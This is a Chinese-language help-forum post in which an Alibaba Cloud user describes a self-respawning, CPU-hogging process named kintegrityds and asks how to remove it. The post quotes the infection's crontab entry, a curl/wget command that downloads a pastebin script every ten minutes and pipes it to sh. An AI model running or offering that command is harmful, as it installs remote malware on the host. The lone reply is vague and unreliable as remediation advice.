云主机 野进程kintegrityds大量占cpu资源, 安全
现象:
1、kintegrityds进程,占用很高cpu,这个进程不是我的。
2、这个进程,使用我建立的账号启动,程序启动后二进制删除,并且做成了一个守护进程,其父进程是1号进程。
3、这个进程,kill和删除不掉 ,有自动加入crontab的行为。这可能是云主机被肉鸡了。
这个crontab我没有执行看,可以参考查一下。
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh
我对这这类问题经验不多,且时间不足,无意于继续研究这个问题。
TODO:
1、如何彻底删除这个进程?
2、请确定这个问题,这可能是一类问题。
3、如我的猜测属实,如何防止这类进程再次入侵?阿里云本身能做到什么程度?对用户有和建议。
展开
收起
1
条回答
写回答
写回答
-
阿里云ping https://ping.gaomeluo.com/aliyun/kintegrityd进程是内核完整性检查跟你的情况有些类似,可能需要升级一下配置如果本条回复帮助你解决了问题,请“采纳”,谢谢2019-03-18 11:52:17赞同 展开评论 打赏
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
相关问答
